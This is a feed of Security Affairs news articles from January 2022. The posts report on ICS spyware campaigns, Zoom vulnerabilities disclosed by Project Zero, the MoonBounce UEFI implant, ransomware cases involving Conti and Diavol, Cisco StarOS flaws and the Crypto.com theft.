“The lifespan of the “anomalous” attacks is limited to about 25 days. And at the same time, the number of attacked computers is less than 100, of which 40-45% are ICS machines, while the rest are part of the same organizations’ IT infrastructure.” reads the analysis published by Kaspersky. “This has become a trend: around 21.2% of all spyware samples blocked on ICS computers worldwide in H1 2021 were part of this new limited-scope short-lifetime attack series and, depending on the region, up to one-sixth of all computers attacked with spyware were hit using this tactic.”

Attackers used to target less than one hundred systems for each campaign, more than half are ICS (integrated computer systems) systems deployed in industrial environments.

Unlike common spyware attacks, most of the samples employed in these campaigns were configured to use SMTP-based (rather than FTP or HTTP(s)) C2s as a one-way communication channel, a circumstance that suggests it was used only to exfiltrate data from infected systems.

Kaspersky researchers speculate the stolen data is used by threat actors to go deeper in the compromise network and to target other organizations in order to collect more credentials.

The attackers use corporate mailboxes compromised in previous attacks as the C2 servers for further attacks.

“Amongst attacks of this kind, we’ve noticed a large set of campaigns that spread from one industrial enterprise to another via hard-to-detect phishing emails disguised as the victim organizations’ correspondence and abusing their corporate email systems to attack through the contact lists of compromised mailboxes.” continues the report.

“Curiously, corporate antispam technologies help the attackers stay unnoticed while exfiltrating stolen credentials from infected machines by making them ‘invisible’ among all the garbage emails in spam folders.”

spyware campaigns 2

The experts have identified over 2,000 corporate email accounts belonging to industrial companies that were used as C2 servers for successive spyware campaigns. The number of stolen and sold corporate email accounts that were abused has been estimated to be greater than 7000.

Many of the email RDP, SMTP, SSH, cPanel, and VPN account credentials siphoned by the attackers were made available on dark web marketplaces and sold to other threat actors.

“In this research, we identified over 25 different marketplaces where data stolen in the credential gathering campaigns targeting industrial companies that we investigated was being sold. At these markets, various sellers offer thousands of RDP, SMTP, SSH, cPanel, and email accounts, as well as malware, fraud schemes, and samples of emails and webpages for social engineering.” concludes the report. “A statistical analysis of metadata for over 50,000 compromised RDP accounts sold in marketplaces shows that 1,954 accounts (3.9%) belong to industrial companies.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, spyware campaigns)

The post Experts warn of anomalous spyware campaigns targeting industrial firms appeared first on Security Affairs.

Google Project Zero discloses details of two Zoom zero-day flaws

21 January 2022 at 14:40

Google Project Zero experts disclosed details of two zero-day flaws impacting Zoom clients and Multimedia Router (MMR) servers.

Google Project Zero researchers Natalie Silvanovich disclosed details of two zero-day vulnerabilities in Zoom clients and Multimedia Router (MMR) servers. An attacker could have exploited the now-fixed issues to crash the service, execute malicious code, and even leak the content of portions of the memory.

The researcher focused its search for bugs in the Zoom client software, including zero-day issues that allowed her to take over the victim’s system without requiring any user interaction.

The two vulnerabilities have been fixed on November 24, 2021, they are a buffer overflow information leakage issue tracked as CVE-2021-34423 and CVE-2021-34424 respectively.

The CVE-2021-34423 vulnerability, is a buffer overflow issue that received a CVSS score of 9.8. An attacker can trigger the vulnerability to execute arbitrary code or crash the service or application.

The experts focused the analysis on the RTP (Real-time Transport Protocol) traffic used for audio and video communications. Silvanovich discovered that manipulating the contents of a buffer that supports reading different data types by sending a malformed chat message, could trigger the flaw causing the client and the MMR server to crash.

“Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).” reads the analysis published by Project Zero. “I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms.”

The CVE-2021-34424 is a process memory exposure flaw that received a CVSS score of 7.5. An attacker can trigger the flaw to potentially gain insight into arbitrary areas of the product’s memory.

The second flaw is caused by the lack of a NULL check that allows to leak data from the memory by joining a Zoom meeting via a web browser.

“This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy.” continues the analysis.

The researcher pointed out that lack of ASLR in the Zoom MMR process exposed users to the risk of attacks, the good news it that Zoom has recently enabled it.

Project Zero experts also pointed out that the closed nature of Zoom also heavily impacted the analysis. Unlike most video conferencing systems, Zoom use a proprietary protocol that make it hard to analyze it.

“Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it,” Silvanovich concludes. “While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, zero-day)

The post Google Project Zero discloses details of two Zoom zero-day flaws appeared first on Security Affairs.

MoonBounce UEFI implant spotted in a targeted APT41 attack

21 January 2022 at 11:59

Researchers have spotted China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce, to maintain persistence.

Kaspersky researchers spotted the China-linked APT41 cyberespionage group using a UEFI implant, dubbed MoonBounce, to maintain persistence.

At the end of 2021, researchers discovered a UEFI firmware-level compromise by analyzing logs from its Firmware Scanner.

Threat actors compromised a single component within the firmware image to intercept the original execution flow of the machine’s boot sequence and inject the sophisticated implant.

UEFI implants like MoonBounce allow attackers to achieve persistence on the target system that is resilient to disk formatting or replacement. In the case of MoonBounce, the bootkit is implanted on the SPI flash memory of the motherboard. A UEFI bootkit implanted in the firmware could not be detected by AVs and any defense solution running on the OS level.

“The purpose of the implant is to facilitate the deployment of user-mode malware that stages execution of further payloads downloaded from the internet;” reads the analysis published by Kaspersky. “The infection chain itself does not leave any traces on the hard drive, as its components operate in memory only, thus facilitating a fileless attack with a small footprint;”

The attackers incorporated the UEFI implant into the CORE_DXE component of the firmware (aka the DXE Foundation), which is invoked early on at the DXE (Driver Execution Environment) phase of the UEFI boot sequence. 


The infection leverages a set of hooks that intercept the execution of several functions in the EFI Boot Services Table, namely AllocatePool, CreateEventEx and ExitBootServices. Attackers used these hooks to hijack the flow of these functions to malicious shellcode and append them to the CORE_DXE image, which in turn sets up additional hooks in subsequent components of the boot sequence (Windows loader).

“This multistage chain of hooks facilitates the propagation of malicious code from the CORE_DXE image to other boot components during system startup, allowing the introduction of a malicious driver to the memory address space of the Windows kernel.” continues the analysis. “This driver, which runs during the initial phases of the kernel’s execution, is in charge of deploying user-mode malware by injecting it into an svchost.exe process, once the operating system is up and running.”

The UEFI implant used by APT41 is to deploy additional user-mode malware used to execute further payloads downloaded from C2 infrastructure.

Kaspersky pointed out that the attack that investigated is fileless, this means that it does not leave any traces on the hard drive and its components only operate in memory.

The researchers spotted other non-UEFI implants in the network targeted with the MoonBounce that were communicating with the same infrastructure that hosted the staging payload.

The researchers explained that the MoonBounce UEFI bootkit was employed in a very targeted attack, the sophisticated malware was detected in a single case.

“We traced some of the commands executed by the attackers after gaining a foothold in the network, which point to lateral movement and exfiltration of information from particular machines. This aligns in profile with some of the previous operations by APT41, wherein intrusions were typically made to intervene in the targeted companies’ supply chain, or to heist sensitive intellectual property and personally identifiable information.” continues the report. “The usage of the UEFI implant in particular indicates the actor’s aim to establish a longstanding foothold within the network, as would be expected in an ongoing espionage activity.”

The c is the third publicly documented case of firmware rootkit used in attacks in the wild, previous attacks leveraging this family of malware were related to the FinSpy surveillance spyware tool and a cyber espionage campaign uncovered by ESET that were spreading the ESPecter bookit.

“MoonBounce marks a particular evolution in this group of threats by presenting a more complicated attack flow in comparison to its predecessors and a higher level of technical competence by its authors, who demonstrate a thorough understanding of the finer details involved in the UEFI boot process,” Kaspersky concludes.

In order to prevent such kinds of attacks Kaspersky recommends regularly updating UEFI firmware, verifying that BootGuard, where applicable, is enabled, and enabling Trust Platform Modules and deployment of a security product that is able to inspect the firmware images.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, MoonBounce)

The post MoonBounce UEFI implant spotted in a targeted APT41 attack appeared first on Security Affairs.

Conti ransomware gang started leaking files stolen from Bank Indonesia

21 January 2022 at 06:22

The central bank of the Republic of Indonesia, Bank Indonesia, confirmed the ransomware attack that hit it in December.

Bank Indonesia confirmed that it was the victim of a ransomware attack that took place last month. The Conti ransomware gang claimed the attack and leaked some allegedly stolen files as proof of the security breach.

A bank spokesperson told Reuters that the ransomware attack did not impact services.

“We were attacked, but so far so good as we took anticipatory measures and most importantly public services at Bank Indonesia were not disrupted at all,” its spokesperson Erwin Haryono told reporters.

According to CNN Indonesia, a spokesman for Indonesia’s cyber agency (BSSN) said no critical data was leaked and the attacks occurred in a Bank Indonesia office on Sumatra island.

Conti operators have added Bank Indonesia to the list of victims on their Tor leaks site, the gang claims to have stolen 13.88 GB worth of files.

Bank Indonesia

Conti operators run a private Ransomware-as-a-Service (RaaS), the malware appeared in the threat landscape at the end of December 2019 and was distributed through TrickBot infections. Experts speculate the operators are members of a Russia-based cybercrime group known as Wizard Spider.

Since August 2020, the group has launched its leak site to threaten its victim to release the stolen data. Conti operators claimed to have already compromised at least 500 organisations worldwide.

In December 2021, the Australian Cyber Security Centre (ACSC) warns of Conti ransomware attacks against multiple Australian organizations from various sectors since November.

The ACSC also published a ransomware profile for the Conti gang that contains information about the operations of the group, including mitigations.

In September, CISA, the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) also warned of an increased number of Conti gang attacks against US organizations.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Conti ransomware)

The post Conti ransomware gang started leaking files stolen from Bank Indonesia appeared first on Security Affairs.

FBI links the Diavol ransomware to the TrickBot gang

20 January 2022 at 22:45

The Federal Bureau of Investigation (FBI) officially linked the Diavol ransomware operation to the infamous TrickBot gang.

The FBI officially linked the Diavol ransomware operation to the infamous TrickBot gang, the group that is behind the TrickBot banking trojan.

“The FBI first learned of Diavol ransomware in October 2021. Diavol is associated with developers from the Trickbot Group, who are responsible for the Trickbot Banking Trojan. Diavol encrypts files solely using an RSA encryption key, and its code is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. While ransom demands have ranged from $10,000 to $500,000, Diavol actors have been willing to engage victims in ransom negotiations and accept lower payments.” reads the flash alert published by the FBI. “The FBI has not yet observed Diavol leak victim data, despite ransom notes including threats to leak stolen information.”

TrickBot is a popular banking Trojan that has been around since October 2016, its authors have continuously upgraded it by implementing new features. Operators continue to offer the botnet through a multi-purpose malware-as-a-service (MaaS) model. Threat actors leverage the botnet to distribute a broad range of malware including info-stealer and ransomware such as Conti and Ryuk. To date, the Trickbot botnet has already infected more than a million computers.

The TrickBot Gang is also behind the development of the BazarBackdoor and Anchor backdoors.

In July, researchers from Fortinet first spotted the new ransomware family, tracked as Diavol, and speculated it might have been developed by Wizard Spider, the cybercrime gang behind the TrickBot botnet.

Fortinet experts noticed similarities between Diavol and Conti threats, but unlike Conti, Diavol doesn’t avoid infecting Russian victims.

diavol ransomware

In August, IBM X-Force researchers conducted a new analysis of an old variant of the threat that unlike the one analyzed by Fortinet experts appears to be a development version used for testing purposes.

The comparison of the two versions allowed the researchers to get insight into the development process of Diavol and of future versions of the malware.

The analysis conducted by IBM X-Force researchers reinforced the link between Diavol ransomware and the TrickBot malware.

Now the FBI’s report provides technical details about the Diavol Ransomware and its link to the TrickBot gang.

“The Bot ID generated by Diavol is nearly identical to the format used by TrickBot and the Anchor DNS malware, also attributed to Trickbot.” continues the report.

The FBI’s advisory also contains indicators of compromise along with mitigations for Diavol.

The FBI encourages victims of the gang to report information concerning suspicious or criminal activity to their local FBI field office.

The FBI also urges all victims of the Diavol operation, to notify law enforcement of attacks.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Diavol ransomware)

The post FBI links the Diavol ransomware to the TrickBot gang appeared first on Security Affairs.

Cisco StarOS flaws could allow remote code execution and information disclosure

20 January 2022 at 19:04

Cisco addressed a critical RCE flaw in the Cisco Redundancy Configuration Manager (RCM) for Cisco StarOS Software.

Cisco has addressed a critical remote code execution vulnerability, tracked as CVE-2022-20649, discovered in the Cisco Redundancy Configuration Manager (RCM) for Cisco StarOS Software.

The flaw, discovered by the company experts during internal security testing, can be exploited by unauthenticated attackers to gain remote code execution (RCE) with root-level privileges on vulnerable devices.

“A vulnerability in Cisco RCM for Cisco StarOS Software could allow an unauthenticated, remote attacker to perform remote code execution on the application with root-level privileges in the context of the configured container,” reads the advisory published by Cisco. “This vulnerability exists because the debug mode is incorrectly enabled for specific services. An attacker could exploit this vulnerability by connecting to the device and navigating to the service with debug mode enabled. A successful exploit could allow the attacker to execute arbitrary commands as the root user.”

The vulnerability exists due to the debug mode being incorrectly enabled for specific services.

Cisco pointed out that an attacker would need to perform detailed reconnaissance to allow for unauthenticated access, the issue could be also exploited by an authenticated attacker.

Cisco’s Product Security Incident Response Team (PSIRT) confirmed that the company is not aware of attacks in the wild exploiting this vulnerability.

Cisco also addressed an information disclosure vulnerability, tracked as CVE-2022-20648, in the Cisco RCM for Cisco StarOS. The flaw resides in a debug function for Cisco RCM for Cisco StarOS Software, an unauthenticated, remote attacker can exploit this issue to perform debug actions that could result in the disclosure of confidential information that should be restricted.

“This vulnerability exists because of a debug service that incorrectly listens to and accepts incoming connections. An attacker could exploit this vulnerability by connecting to the debug port and executing debug commands. A successful exploit could allow the attacker to view sensitive debugging information.” reads the advisory published by the IT giant.

The company addressed both flaws with the release of Cisco RCM for StarOS 21.25.4.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Cisco StarOS)

The post Cisco StarOS flaws could allow remote code execution and information disclosure appeared first on Security Affairs.

Crypto.com hack impacted 483 accounts and resulted in a $34 million theft

20 January 2022 at 15:05

Crypto.com confirmed that a cyber attack compromised around 400 of its customer accounts leading in the theft of $33 million.

Crypto.com is a cryptocurrency exchange app based in Singapore, the app currently has 10 million users and 3,000 employees. Recently, several Crypto.com users reported suspicious transactions that stole thousands of dollars in Ethereum (ETH) despite their accounts being protected with 2FA.

The company initially confirmed the unauthorized access to wallets belonging to a ‘small number’ of users.

This update will be rolled out to users progressively over the next few hours.

Once complete, withdrawals will be re-enabled.

We understand this may be an inconvenience, but security comes first.

Thank you for your support.

— Crypto.com (@cryptocom) January 17, 2022

The company reassured its users saying that all funds are safe.

Now the company’s CEO Kris Marszalek has confirmed during an interview with Bloomberg Live that 483 customer accounts were compromised and that threat actors stole $33 million worth of cryptocurrency.

JUST IN: CEO @cryptocom’s Kris Marszalek discusses the site's recent hack with @BloombergTV’s @emilychangtv. "Customer funds were never at risk." #TheYearAhead pic.twitter.com/YlCtGO60t5

— Bloomberg Live (@BloombergLive) January 19, 2022

“On 17 January 2022, Crypto.com learned that a small number of users had unauthorized crypto withdrawals on their accounts. Crypto.com promptly suspended withdrawals for all tokens to initiate an investigation and worked around the clock to address the issue. No customers experienced a loss of funds. In the majority of cases we prevented the unauthorized withdrawal, and in all other cases customers were fully reimbursed.” reads a security report published by Crypto.com. “The incident affected 483 Crypto.com users. Unauthorised withdrawals totalled 4,836.26 ETH, 443.93 BTC and approximately US$66,200 in other currencies.”

Initial news about the security breach reported the theft of 4,830 ETH (roughly $15 million), but according to ErgoBTC, an analyst at bitcoin research firm OXT Research, the attackers may have stolen around $33 million.

Adding another 444 BTC to the previously reported 4.6k ETH from yesterday's @cryptocom hack.

Still no acknowledgement of loss, despite large outflows from the custodial wallet into ETH's Tornado Cash and a well known BTC tumbler (as detailed below). pic.twitter.com/GalJKM6bi9

— ∴Ergo∴ (@ErgoBTC) January 18, 2022

ErgoBTC also discovered another wallet containing 172.9 BTC ($7 million) that belongs to the threat actors behind the Crypto.com security breach.

The threat actors may also have stolen 444 BTC (18.4 million) from the exchange’s custodial wallet. Experts also reported that the threat actors have already laundered 271 BTC ($11 million) via a bitcoin tumbler service that was often used by North Korea-linked APT groups.

“Per ErgoBTC’s tweet on Tuesday, an additional 444 BTC ($18.5 million) was siphoned from Crypto.com’s payout wallet. Detailing the suspicious transactions, ErgoBTC said OXT Research first flagged a suspicious payout from the exchange’s custodial wallet to the tune of 52.55 BTC ($2.18 million).” reported an article published by TheBlockCrypto. “This transaction was followed by “several hundred withdrawals” as noted by ErgoBTC that were later batched into four outputs of 67.75 BTC ($2.81 million) each. These four batched outputs totaling 271 BTC ($11.25 million) were funneled via a bitcoin tumbler — a mixing service that allows users to combine different transactions to make it difficult to trace BTC transfers.”

The impacted accounts were restored at the time of this writing, the company also revoked all customer 2FA tokens and announced to have implemented additional security measures to protect its platform.

“Crypto.com introduced an additional layer of security on 18 January 2022 to add a mandatory 24-hour delay between registration of a new whitelisted withdrawal address, and first withdrawal. Users will receive notifications that withdrawal addresses have been added, to give them adequate time to react and respond. The notification message provides useful reminders and instructions on contacting our team if the address whitelisting was unauthorized.” states the company.

Crypto.com announced the introduction of the Worldwide Account Protection Program (WAPP) that aims at protecting user funds in cases threat actors will gain unauthorized access to their account and withdraws funds without the user’s permission. WAPP will cover losses up to USD$250,000 for qualified users.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, BITCOIN)

The post Crypto.com hack impacted 483 accounts and resulted in a $34 million theft appeared first on Security Affairs.